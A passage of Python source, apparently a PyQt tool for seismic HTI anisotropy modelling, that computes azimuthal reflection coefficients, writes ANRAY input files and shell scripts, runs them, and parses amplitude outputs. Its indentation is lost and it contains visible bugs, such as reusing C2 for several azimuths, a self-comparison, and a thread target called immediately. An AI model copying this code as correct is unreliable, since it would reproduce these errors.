C2 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi2 * np.pi / 180), 4) + deltad * pow(np.sin(phi2 * np.pi / 180), 2) * pow(np.cos(phi2 * np.pi / 180), 2))
B3 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi3 * np.pi / 180), 2))
C3 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi3 * np.pi / 180), 4) + deltad * pow(np.sin(phi3 * np.pi / 180), 2) * pow(np.cos(phi3 * np.pi / 180), 2))
B4 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi4 * np.pi / 180), 2))
C4 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi4 * np.pi / 180), 4) + deltad * pow(np.sin(phi4 * np.pi / 180), 2) * pow(np.cos(phi4 * np.pi / 180), 2))
B5 = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG) + (deltad + 2 * pow(2 * medvs / medvp, 2) * deltay) * pow(np.cos(phi5 * np.pi / 180), 2))
C5 = 0.5* (deltavp / medvp + deltae * pow(np.cos(phi5 * np.pi / 180), 4) + deltad * pow(np.sin(phi5 * np.pi / 180), 2) * pow(np.cos(phi5 * np.pi / 180), 2))
B_iso = 0.5* (deltavp / medvp - (pow(2 * medvs / medvp, 2) * deltaG / medG))
C_iso = 0.5 * (deltavp / medvp)
coef_refl1 = A + B1 * pow(np.sin(theta * np.pi / 180), 2) + C1 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl2 = A + B2 * pow(np.sin(theta * np.pi / 180), 2) + C2 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl3 = A + B3 * pow(np.sin(theta * np.pi / 180), 2) + C2 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl4 = A + B4 * pow(np.sin(theta * np.pi / 180), 2) + C2 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_refl5 = A + B5 * pow(np.sin(theta * np.pi / 180), 2) + C2 * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
coef_iso = A + B_iso * pow(np.sin(theta * np.pi / 180), 2) + C_iso * pow(np.sin(theta * np.pi / 180), 2) * pow(np.tan(theta * np.pi / 180), 2)
if self.split_box0_90.isChecked():
dif1= np.zeros(len(coef_refl1))
for i in range(len(coef_refl1)):
if abs(coef_refl5[i]) > abs(coef_refl1[i]):
dif1[i] = abs(coef_refl5[i] - coef_refl1[i]) / abs(coef_refl1[i])
if dif1[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'ro')
self.axes.plot(theta[i], coef_refl5[i], 'ro')
break
else:
dif1[i] = abs(coef_refl1[i] - coef_refl5[i]) / abs(coef_refl5[i])
if dif1[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'ro')
self.axes.plot(theta[i], coef_refl5[i], 'ro')
break
if self.split_box0_45.isChecked():
dif2= np.zeros(len(coef_refl1))
for i in range(len(coef_refl1)):
if abs(coef_refl3[i]) > abs(coef_refl1[i]):
dif2[i] = abs(coef_refl3[i] - coef_refl1[i]) / abs(coef_refl1[i])
if dif2[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'bo')
self.axes.plot(theta[i], coef_refl3[i], 'bo')
break
else:
dif2[i] = abs(coef_refl1[i] - coef_refl3[i]) / abs(coef_refl3[i])
if dif2[i] > 0.1:
self.axes.plot(theta[i], coef_refl1[i], 'bo')
self.axes.plot(theta[i], coef_refl3[i], 'bo')
break
if self.split_box45_90.isChecked():
dif3= np.zeros(len(coef_refl3))
for i in range(len(coef_refl3)):
if abs(coef_refl5[i]) > abs(coef_refl5[i]):
dif3[i] = abs(coef_refl5[i] - coef_refl3[i]) / abs(coef_refl3[i])
if dif3[i] > 0.1:
self.axes.plot(theta[i], coef_refl3[i], 'yo')
self.axes.plot(theta[i], coef_refl5[i], 'yo')
break
else:
dif3[i] = abs(coef_refl3[i] - coef_refl5[i]) / abs(coef_refl5[i])
if dif3[i] > 0.1:
self.axes.plot(theta[i], coef_refl3[i], 'yo')
self.axes.plot(theta[i], coef_refl5[i], 'yo')
break
if self.split_box30_60.isChecked():
dif4= np.zeros(len(coef_refl4))
for i in range(len(coef_refl4)):
if abs(coef_refl4[i]) > abs(coef_refl2[i]):
dif4[i] = abs(coef_refl4[i] - coef_refl2[i]) / abs(coef_refl2[i])
if dif4[i] > 0.1:
self.axes.plot(theta[i], coef_refl2[i], 'go')
self.axes.plot(theta[i], coef_refl4[i], 'go')
break
else:
dif4[i] = abs(coef_refl2[i] - coef_refl4[i]) / abs(coef_refl4[i])
if dif4[i] > 0.1:
self.axes.plot(theta[i], coef_refl4[i], 'go')
self.axes.plot(theta[i], coef_refl2[i], 'go')
break
self.axes.grid()
self.axes.plot(theta, coef_refl1, '+', label='0')
self.axes.plot(theta, coef_refl2, '+', label='30')
self.axes.plot(theta, coef_refl3, '+', label='45')
self.axes.plot(theta, coef_refl4, '+', label='60')
self.axes.plot(theta, coef_refl5, '+', label='90')
self.axes.plot(theta, coef_iso, label='iso', linewidth=2, linestyle='dashed', color='black')
self.axes2.set_xlim(self.axes.get_xlim())
self.axes2.set_xticks(theta)
self.axes2.set_xticklabels(a)
self.axes2.set_xlabel('Distância (m)', size=6)
for label in self.axes2.xaxis.get_ticklabels()[::2]:
label.set_visible(False)
self.axes.legend(title='Azimute', fontsize=6)
self.canvas.draw()
#Função para gerar arquivos anray para diferentes azimutes (0, 30, 45, 60, 90)
def anray(self):
azimute = np.array([0, 30, 45, 60, 90])
self.anray_file(azimute)
#Função que gera o arquivo do anray para um azimute específico.
def anray_file(self, azimute):
azh = azimute
self.size = 0
self.progressBar.setValue(self.size)
for h in azh:
self.size = self.size + 10
self.progressBar.setValue(self.size)
file = open('modelo_anray_%s.modelo' %h, 'w')
file.write("'modelo HTI azimute %s'\n" %(h))
file.write("/\n")
if self.checkBox_solo.isChecked():
file.write('%s %s %s %s\n' % (2, 4, 10, 10))
else:
file.write('%s %s %s %s\n' % (2, 3, 10, 10))
#camada1
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 0))
file.write('%s %s\n' % (0, 0))
#camada de solo
if self.checkBox_solo.isChecked():
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (self.solo_espessura.value() / 1000, self.solo_espessura.value() / 1000))
file.write('%s %s\n' % (self.solo_espessura.value() / 1000, self.solo_espessura.value() / 1000))
# camada2
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (self.spinBox_thick.value()/1000, self.spinBox_thick.value()/1000))
file.write('%s %s\n' % (self.spinBox_thick.value()/1000, self.spinBox_thick.value()/1000))
# camada3
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (0, 100))
file.write('%s %s\n' % (2, 2))
file.write('%s %s\n' % (2, 2))
#printerplot
file.write('%s %s\n%s %s\n%s %s\n' % (0, 0.5, 0.9, 1.1, 1.9, 2.1))
if self.checkBox_solo.isChecked():
file.write('%s %s\n' % (1.9, 2.1))
#especificação de parametros elásticos e densidade constante
file.write('%s %s\n' % (0, 1))
#densidades
if self.checkBox_solo.isChecked():
file.write('%s '% (self.solo_densidade.value() / 1000))
file.write('%s %s\n' % (self.spinBox_p1.value()/1000, self.spinBox_p2.value()/1000))
if self.checkBox_solo.isChecked():
file.write('%s %s\n' % (0, 0))
file.write('%s %s %s\n' % (1, 1, 1)) # homogenea em x,y,z
file.write('/\n/\n/\n') # gridlines
file.write('%s\n%s\n' % ((self.solo_vp.value() / 1000) ** 2, (self.solo_vs.value() / 1000) ** 2)) # quadrado da onda P e S
#camada isotrópica
file.write('%s %s\n' % (0, 0))
file.write('%s %s %s\n' % (1, 1, 1)) #homogenea em x,y,z
file.write('/\n/\n/\n') #gridlines
file.write('%s\n%s\n' % ((self.spinBox_vp1.value()/1000)**2, (self.spinBox_vs1.value()/1000)**2)) #quadrado da onda P e S
# camada anisotrópica
if self.dn and self.dt == 0:
file.write('%s %s\n' % (0, 0))
file.write('%s %s %s\n' % (1, 1, 1)) # homogenea em x,y,z
file.write('/\n/\n/\n') # gridlines
file.write('%s\n%s\n' % ((self.spinBox_vp2.value() / 1000) ** 2, (self.spinBox_vs2.value() / 1000) ** 2))
else:
file.write('%s %s\n' % (1, 0))
file.write('%s %s %s\n' % (1, 1, 1)) # homogenea em x,y,z
file.write('/\n/\n/\n') # gridlines
file.write('%s\n' % (self.c11)) #A11
file.write('%s\n' % (self.c13)) # A12
file.write('%s\n' % (self.c13)) # A13
file.write('%s\n' % (0)) # A14
file.write('%s\n' % (0)) # A15
file.write('%s\n' % (0)) # A16
file.write('%s\n' % (self.c33)) # A22
file.write('%s\n' % (self.c23)) # A23
file.write('%s\n' % (0)) # A24
file.write('%s\n' % (0)) # A25
file.write('%s\n' % (0)) # A26
file.write('%s\n' % (self.c33)) # A33
file.write('%s\n' % (0)) # A34
file.write('%s\n' % (0)) # A35
file.write('%s\n' % (0)) # A36
file.write('%s\n' % (self.c44)) # A44
file.write('%s\n' % (0)) # A45
file.write('%s\n' % (0)) # A46
file.write('%s\n' % (self.c55)) # A55
file.write('%s\n' % (0)) # A55
file.write('%s\n' % (self.c55)) # A66
#!ICONT,MEP,MOUT,MDIM,METHOD,MREG,ITMAX,IPOL,IPREC,IRAYPL,IPRINT,IAMP,MTRNS,ICOEF,IRT,ILOC,MCOD,MORI
file.write('%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s\n' % (1, self.spinBox_ngeo.value(), 1, 1, 0, 1, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1))
#!PROF(1),RMIN,RSTEP,XPRF,YPRF
if h < 90:
azh = (h/180)*np.pi
else:
azh = 1.5
file.write('%s %s %s %s %s\n' % (azh, self.spinBox_rmin.value()/1000, self.spinBox_rstep.value()/1000, 10, 10))
#!XSOUR,YSOUR,ZSOUR,TSOUR,DT,AC,REPS,PREPS
file.write('%s %s %s %s %s %s %s %s\n' % (10, 10, 0, 0, 0.04, 0.0001, 0.0005, 0.0005))
#!AMIN, ASTEP, AMAX
file.write('%s %s %s\n' % (-0.3, 0.01, 1.8))
#!BMIN, BSTEP, BMAX
file.write('%s %s %s\n' % (-0.3, 0.01, 1.8))
#!KC, KREF, ((CODE(I, K), K = 1, 2), I = 1, KREF)
file.write('%s %s %s %s %s %s\n' % (1, 2, 1, 3, 1, 3))
if self.checkBox_solo.isChecked():
file.write('%s %s %s %s %s %s %s %s %s %s\n' % (1, 4, 1, 3, 2, 3, 2, 3, 1, 3))
file.write('%s %s\n' % (0, 0))
file.write('%s/' % (0))
file.close()
self.anray_script(h)
#Função que constrói um script para rodar os modelos e gerar as figuras
def anray_script(self, azh):
files = open('anray_script%s.sh' %azh, 'w')
files.write('modname=modelo_anray\nanrayinput="$modname"_%s.modelo\n./anray <<FIM\n$anrayinput\nFIM\n\n\n' %(azh))
files.write('cp fort.30 amplitudes_%s.dat\n\n' %azh)
files.write('cp lu2.anray lu2_%s.anray' %azh)
files.close()
subprocess.call('chmod +x anray_script%s.sh' %azh, shell=True)
thread_anray = threading.Thread(target=self.anray_thr(azh))
thread_anray.start()
#Função para executar o script e aguardar o término da execução
def anray_thr(self, azh):
FNULL = open(os.devnull, 'w')
str = './anray_script%s.sh' %azh
p = subprocess.Popen(str, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
status = p.wait()
shutil.copy2('fort.30', '%s/HTI_P_model/amplitudes_%s.dat' %(self.anray_path, azh))
shutil.copy2('lu2.anray', '%s/HTI_P_model/lu2_%s.anray' % (self.anray_path, azh))
shutil.move('modelo_anray_%s.modelo' % azh,'%s/HTI_P_model/modelo_anray_%s.modelo' % (self.anray_path, azh))
os.remove('%s/anray_script%s.sh' %(self.anray_path, azh))
self.size = self.size + 10
self.progressBar.setValue(self.size)
if self.progressBar.value() == 100:
self.frame_7.setEnabled(True)
self.frame_8.setEnabled(True)
self.frame_11.setEnabled(True)
self.frame_13.setEnabled(True)
self.sismo_button.setEnabled(True)
self.frame_14.setEnabled(True)
self.frame_9.setEnabled(True)
if self.checkBox_solo.isChecked() == False:
self.checkBox_solo_sismo.setChecked(False)
self.checkBox_solo_sismo2.setChecked(False)
self.checkBox_solo_sismo.setEnabled(False)
self.frame_12.setEnabled(False)
self.label_47.setEnabled(False)
else:
self.frame_12.setEnabled(True)
self.checkBox_solo_sismo.setEnabled(True)
self.label_47.setEnabled(True)
self.split()
#Função que plota as componentes a partir do anray e analisa a separação
def split(self):
self.axes_anray_tot.cla()
self.axes_anray_tot2.cla()
self.axes_anray_rad.cla()
self.axes_anray_rad2.cla()
self.axes_anray_z.cla()
self.axes_anray_z2.cla()
self.axes_anray_time.cla()
self.axes_anray2_tot.cla()
self.axes_anray2_z.cla()
self.axes_anray2_time.cla()
self.axes_anray2_rad.cla()
f_0 = open('amplitudes_0.dat', "r")
f_30 = open('amplitudes_30.dat', "r")
f_45 = open('amplitudes_45.dat', "r")
f_60 = open('amplitudes_60.dat', "r")
f_90= open('amplitudes_90.dat', "r")
time_basalto = []
time_solo=[]
geofone_0 = []
x_0 = []
y_0 = []
z_0 = []
xc_0 = []
yc_0 = []
zc_0 = []
geofone_30 = []
x_30 = []
y_30 = []
z_30 = []
xc_30 = []
yc_30 = []
zc_30 = []
geofone_45 = []
x_45 = []
y_45 = []
z_45 = []
xc_45 = []
yc_45 = []
zc_45 = []
geofone_60 = []
x_60 = []
y_60 = []
z_60 = []
xc_60 = []
yc_60 = []
zc_60 = []
geofone_90 = []
x_90 = []
y_90 = []
z_90 = []
xc_90 = []
yc_90 = []
zc_90 = []
solo_x_0=[]
solo_x_30=[]
solo_x_45 = []
solo_x_60 = []
solo_x_90 = []
solo_y_0=[]
solo_y_30=[]
solo_y_45 = []
solo_y_60 = []
solo_y_90 = []
solo_z_0=[]
solo_z_30=[]
solo_z_45 = []
solo_z_60 = []
solo_z_90 = []
fase_x_0 = []
fase_x_30 = []
fase_x_45 = []
fase_x_60 = []
fase_x_90 = []
fase_y_0 = []
fase_y_30 = []
fase_y_45 = []
fase_y_60 = []
fase_y_90 = []
fase_z_0 = []
fase_z_30 = []
fase_z_45 = []
fase_z_60 = []
fase_z_90 = []
self.axes_anray_tot.set_ylabel("total")
self.axes_anray_rad.set_ylabel("radial")
self.axes_anray_z.set_ylabel("vertical")
self.axes_anray_tot.grid()
self.axes_anray_rad.grid()
self.axes_anray_z.grid()
self.axes_anray_time.grid()
self.axes_anray2_tot.set_ylabel("total")
self.axes_anray2_rad.set_ylabel("radial")
self.axes_anray2_z.set_ylabel("vertical")
self.axes_anray2_tot.grid()
self.axes_anray2_rad.grid()
self.axes_anray2_z.grid()
self.axes_anray2_time.grid()
if self.checkBox_solo.isChecked():
two_layer = True
var = 2
else:
two_layer = False
var = 1
for line in f_0:
coluna = line.split()
if float(coluna[0]) == var:
geofone_0.append(int(coluna[1]))
#parte real
x_0.append(float(coluna[3]))
y_0.append(float(coluna[5]))
z_0.append(float(coluna[7]))
#parte complexa
xc_0.append(float(coluna[4]))
yc_0.append(float(coluna[6]))
zc_0.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 2:
time_basalto.append(float(coluna[2]))
else :
time_solo.append(float(coluna[2]))
solo_x_0.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_0.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_0.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_0.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_0.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_0.append(np.arctan2(float(coluna[8]), float(coluna[7])))
if two_layer == False:
time_basalto.append(float(coluna[2]))
f_0.close()
geo_0 = np.asarray(geofone_0)
time_basalto = np.asarray(time_basalto)
time_solo = np.asarray(time_solo)
x_0 = np.asarray(x_0)
y_0 = np.asarray(y_0)
z_0 = np.asarray(z_0)
xc_0 = np.asarray(xc_0)
yc_0 = np.asarray(yc_0)
zc_0 = np.asarray(zc_0)
solo_x_0 = np.asarray(solo_x_0)
solo_x_0 = np.fliplr([solo_x_0])[0]
solo_y_0 = np.asarray(solo_y_0)
solo_y_0 = np.fliplr([solo_y_0])[0]
solo_z_0 = np.asarray(solo_z_0)
solo_z_0 = np.fliplr([solo_z_0])[0]
fase_x_0 = np.asarray(fase_x_0)
fase_x_0 = np.fliplr([fase_x_0])[0]
fase_y_0 = np.asarray(fase_y_0)
fase_y_0 = np.fliplr([fase_y_0])[0]
fase_z_0 = np.asarray(fase_z_0)
fase_z_0 = np.fliplr([fase_z_0])[0]
solo_rad_0 = np.sqrt(solo_x_0 ** 2 + solo_y_0 ** 2)
self.solo_fase_rad = fase_x_0 + fase_y_0
self.solo_fase_z = fase_z_0
solo_0_tot = np.sqrt(solo_x_0 ** 2 + solo_y_0 ** 2 + solo_z_0 ** 2)
self.refl_solo_rad_0 = solo_rad_0
self.refl_solo_z_0 = solo_z_0
self.time_basalto = np.fliplr([time_basalto])[0]
self.time_solo = np.fliplr([time_solo])[0]
x0_re = np.fliplr([x_0])[0]
y0_re = np.fliplr([y_0])[0]
z0_re = np.fliplr([z_0])[0]
x0c_re = np.fliplr([xc_0])[0]
y0c_re = np.fliplr([yc_0])[0]
z0c_re = np.fliplr([zc_0])[0]
ampx_0 = np.sqrt(x0_re**2 + x0c_re**2)
ampy_0 = np.sqrt(y0_re **2 + y0c_re ** 2)
ampz_0 = np.sqrt(z0_re **2 + z0c_re ** 2)
phx_0 = np.arctan2(x0c_re,x0_re)
phy_0 = np.arctan2(y0c_re, y0_re)
phz_0 = np.arctan2(z0c_re, z0_re)
self.hti_fase_rad_0 = phx_0
self.hti_fase_z_0 = phz_0
geo0_re = self.dist
tot0 = np.sqrt(ampx_0 ** 2 + ampy_0 ** 2 + ampz_0 ** 2)
rad_0 = np.sqrt(ampx_0 ** 2 + ampy_0 ** 2)
self.axes_anray_tot.plot(geo0_re, tot0, label=0)
self.refl_tot_0 = tot0
self.refl_rad_0 = rad_0
self.refl_z_0 = ampz_0
self.axes_anray_z.plot(geo0_re, ampz_0, label=0)
self.axes_anray_rad.plot(geo0_re, rad_0, label=0)
try:
if two_layer==True:
self.axes_anray2_tot.plot(geo0_re, solo_0_tot, label=0)
self.axes_anray2_rad.plot(geo0_re, solo_rad_0, label=0)
self.axes_anray2_z.plot(geo0_re, solo_z_0, label=0)
if two_layer == True:
self.axes_anray_time.plot(geo0_re, self.time_basalto, color='blue')
self.axes_anray2_time.plot(geo0_re, self.time_solo, color='brown')
else:
self.axes_anray_time.plot(geo0_re, self.time_basalto, color='blue')
self.axes_anray_time.set_ylabel('tempo (s)')
self.axes_anray2_time.set_ylabel('tempo (s)')
for line in f_30:
coluna = line.split()
if float(coluna[0]) == var:
geofone_30.append(int(coluna[1]))
x_30.append(float(coluna[3]))
y_30.append(float(coluna[5]))
z_30.append(float(coluna[7]))
xc_30.append(float(coluna[4]))
yc_30.append(float(coluna[6]))
zc_30.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_30.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_30.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_30.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_30.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_30.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_30.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_30.close()
geo_30 = np.asarray(geofone_30)
x_30 = np.asarray(x_30)
y_30 = np.asarray(y_30)
z_30 = np.asarray(z_30)
xc_30 = np.asarray(xc_30)
yc_30 = np.asarray(yc_30)
zc_30 = np.asarray(zc_30)
x30_re = np.fliplr([x_30])[0]
y30_re = np.fliplr([y_30])[0]
z30_re = np.fliplr([z_30])[0]
x30c_re = np.fliplr([xc_30])[0]
y30c_re = np.fliplr([yc_30])[0]
z30c_re = np.fliplr([zc_30])[0]
ampx_30 = np.sqrt(x30_re ** 2 + x30c_re ** 2)
ampy_30 = np.sqrt(y30_re ** 2 + y30c_re ** 2)
ampz_30 = np.sqrt(z30_re ** 2 + z30c_re ** 2)
phx_30 = np.arctan2(x30c_re, x30_re)
phy_30 = np.arctan2(y30c_re, y30_re)
phz_30 = np.arctan2(z30c_re, z30_re)
self.hti_fase_rad_30 = phx_30
self.hti_fase_z_30 = phz_30
geo30_re = self.dist
tot30 = np.sqrt(ampx_30 ** 2 + ampy_30 ** 2 + ampz_30 ** 2)
rad_30 = np.sqrt(ampx_30 ** 2 + ampy_30 ** 2)
solo_x_30 = np.asarray(solo_x_30)
solo_x_30 = np.fliplr([solo_x_30])[0]
solo_y_30 = np.asarray(solo_y_30)
solo_y_30 = np.fliplr([solo_y_30])[0]
solo_z_30 = np.asarray(solo_z_30)
solo_z_30 = np.fliplr([solo_z_30])[0]
solo_30_tot = np.sqrt(solo_x_30 ** 2 + solo_y_30 ** 2 + solo_z_30 ** 2)
solo_rad_30 = np.sqrt(solo_x_30 ** 2 + solo_y_30 ** 2)
fase_x_30 = np.asarray(fase_x_30)
fase_x_30 = np.fliplr([fase_x_30])[0]
fase_y_30 = np.asarray(fase_y_30)
fase_y_30 = np.fliplr([fase_y_30])[0]
fase_z_30 = np.asarray(fase_z_30)
fase_z_30 = np.fliplr([fase_z_30])[0]
self.refl_solo_x_30 = solo_rad_30
self.refl_solo_y_30 = solo_y_30
self.refl_solo_z_30 = solo_z_30
self.refl_tot_30 = tot30
self.refl_rad_30 = rad_30
self.refl_y_30 = y30_re
self.refl_z_30 = ampz_30
self.axes_anray_tot.plot(geo30_re, tot30, label=30)
self.axes_anray_rad.plot(geo30_re, rad_30, label=30)
self.axes_anray_z.plot(geo30_re, ampz_30, label=30)
if two_layer == True:
self.axes_anray2_z.plot(geo30_re, solo_z_30, label=30)
self.axes_anray2_tot.plot(geo30_re, solo_30_tot, label=30)
self.axes_anray2_rad.plot(geo30_re, solo_rad_30, label=30)
for line in f_45:
coluna = line.split()
if float(coluna[0]) == var:
geofone_45.append(int(coluna[1]))
x_45.append(float(coluna[3]))
y_45.append(float(coluna[5]))
z_45.append(float(coluna[7]))
xc_45.append(float(coluna[4]))
yc_45.append(float(coluna[6]))
zc_45.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_45.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_45.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_45.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_45.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_45.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_45.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_45.close()
geo_45 = np.asarray(geofone_45)
x_45 = np.asarray(x_45)
y_45 = np.asarray(y_45)
z_45 = np.asarray(z_45)
xc_45 = np.asarray(xc_45)
yc_45 = np.asarray(yc_45)
zc_45 = np.asarray(zc_45)
x45_re = np.fliplr([x_45])[0]
y45_re = np.fliplr([y_45])[0]
z45_re = np.fliplr([z_45])[0]
x45c_re = np.fliplr([xc_45])[0]
y45c_re = np.fliplr([yc_45])[0]
z45c_re = np.fliplr([zc_45])[0]
ampx_45 = np.sqrt(x45_re ** 2 + x45c_re ** 2)
ampy_45 = np.sqrt(y45_re ** 2 + y45c_re ** 2)
ampz_45 = np.sqrt(z45_re ** 2 + z45c_re ** 2)
phx_45 = np.arctan2(x45c_re, x45_re)
phy_45 = np.arctan2(y45c_re, y45_re)
phz_45 = np.arctan2(z45c_re, z45_re)
self.hti_fase_rad_45 = phx_45
self.hti_fase_z_45 = phz_45
geo45_re = self.dist
tot45 = np.sqrt(ampx_45 ** 2 + ampy_45 ** 2 + ampz_45 ** 2)
rad_45 = np.sqrt(ampx_45 ** 2 + ampy_45 ** 2)
solo_x_45 = np.asarray(solo_x_45)
solo_x_45 = np.fliplr([solo_x_45])[0]
solo_y_45 = np.asarray(solo_y_45)
solo_y_45 = np.fliplr([solo_y_45])[0]
solo_z_45 = np.asarray(solo_z_45)
solo_z_45 = np.fliplr([solo_z_45])[0]
solo_45_tot = np.sqrt(solo_x_45 ** 2 + solo_y_45 ** 2 + solo_z_45 ** 2)
solo_rad_45 = np.sqrt(solo_x_45 ** 2 + solo_y_45 ** 2)
fase_x_45 = np.asarray(fase_x_45)
fase_x_45 = np.fliplr([fase_x_45])[0]
fase_y_45 = np.asarray(fase_y_45)
fase_y_45 = np.fliplr([fase_y_45])[0]
fase_z_45 = np.asarray(fase_z_45)
fase_z_45 = np.fliplr([fase_z_45])[0]
self.refl_solo_x_45 = solo_rad_45
self.refl_solo_y_45 = solo_y_45
self.refl_solo_z_45 = solo_z_45
self.refl_tot_45 = tot45
self.refl_rad_45 = rad_45
self.refl_y_45 = y45_re
self.refl_z_45 = ampz_45
self.axes_anray_tot.plot(geo45_re, tot45, label=45)
self.axes_anray_rad.plot(geo45_re, rad_45, label=45)
self.axes_anray_z.plot(geo45_re, ampz_45, label=45)
if two_layer == True:
self.axes_anray2_z.plot(geo45_re, solo_z_45, label=45)
self.axes_anray2_tot.plot(geo45_re, solo_45_tot, label=45)
self.axes_anray2_rad.plot(geo45_re, solo_rad_45, label=45)
for line in f_60:
coluna = line.split()
if float(coluna[0]) == var:
geofone_60.append(int(coluna[1]))
x_60.append(float(coluna[3]))
y_60.append(float(coluna[5]))
z_60.append(float(coluna[7]))
xc_60.append(float(coluna[4]))
yc_60.append(float(coluna[6]))
zc_60.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
solo_x_60.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_60.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_60.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_60.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_60.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_60.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_60.close()
geo_60 = np.asarray(geofone_60)
x_60 = np.asarray(x_60)
y_60 = np.asarray(y_60)
z_60 = np.asarray(z_60)
xc_60 = np.asarray(xc_60)
yc_60 = np.asarray(yc_60)
zc_60 = np.asarray(zc_60)
x60_re = np.fliplr([x_60])[0]
y60_re = np.fliplr([y_60])[0]
z60_re = np.fliplr([z_60])[0]
x60c_re = np.fliplr([xc_60])[0]
y60c_re = np.fliplr([yc_60])[0]
z60c_re = np.fliplr([zc_60])[0]
ampx_60 = np.sqrt(x60_re ** 2 + x60c_re ** 2)
ampy_60 = np.sqrt(y60_re ** 2 + y60c_re ** 2)
ampz_60 = np.sqrt(z60_re ** 2 + z60c_re ** 2)
phx_60 = np.arctan2(x60c_re, x60_re)
phy_60 = np.arctan2(y60c_re, y60_re)
phz_60 = np.arctan2(z60c_re, z60_re)
self.hti_fase_rad_60 = phx_60
self.hti_fase_z_60 = phz_60
geo60_re = self.dist
tot60 = np.sqrt(ampx_60 ** 2 + ampy_60 ** 2 + ampz_60 ** 2)
rad_60 = np.sqrt(ampx_60 ** 2 + ampy_60 ** 2)
solo_x_60 = np.asarray(solo_x_60)
solo_x_60 = np.fliplr([solo_x_60])[0]
solo_y_60 = np.asarray(solo_y_60)
solo_y_60 = np.fliplr([solo_y_60])[0]
solo_z_60 = np.asarray(solo_z_60)
solo_z_60 = np.fliplr([solo_z_60])[0]
solo_60_tot = np.sqrt(solo_x_60 ** 2 + solo_y_60 ** 2 + solo_z_60 ** 2)
solo_rad_60 = np.sqrt(solo_x_60 ** 2 + solo_y_60 ** 2)
fase_x_60 = np.asarray(fase_x_60)
fase_x_60 = np.fliplr([fase_x_60])[0]
fase_y_60 = np.asarray(fase_y_60)
fase_y_60 = np.fliplr([fase_y_60])[0]
fase_z_60 = np.asarray(fase_z_60)
fase_z_60 = np.fliplr([fase_z_60])[0]
self.refl_solo_x_60 = solo_rad_60
self.refl_solo_y_60 = solo_y_60
self.refl_solo_z_60 = solo_z_60
self.refl_tot_60 = tot60
self.refl_rad_60 = rad_60
self.refl_y_60 = y60_re
self.refl_z_60 = ampz_60
self.axes_anray_tot.plot(geo60_re, tot60, label=60)
self.axes_anray_rad.plot(geo60_re, rad_60, label=60)
self.axes_anray_z.plot(geo60_re, ampz_60, label=60)
if two_layer == True:
self.axes_anray2_z.plot(geo60_re, solo_z_60, label=60)
self.axes_anray2_tot.plot(geo60_re, solo_60_tot, label=60)
self.axes_anray2_rad.plot(geo60_re, solo_rad_60, label=60)
for line in f_90:
coluna = line.split()
if float(coluna[0]) == var:
geofone_90.append(int(coluna[1]))
x_90.append(float(coluna[3]))
y_90.append(float(coluna[5]))
z_90.append(float(coluna[7]))
xc_90.append(float(coluna[4]))
yc_90.append(float(coluna[6]))
zc_90.append(float(coluna[8]))
if two_layer == True:
if float(coluna[0]) == 1:
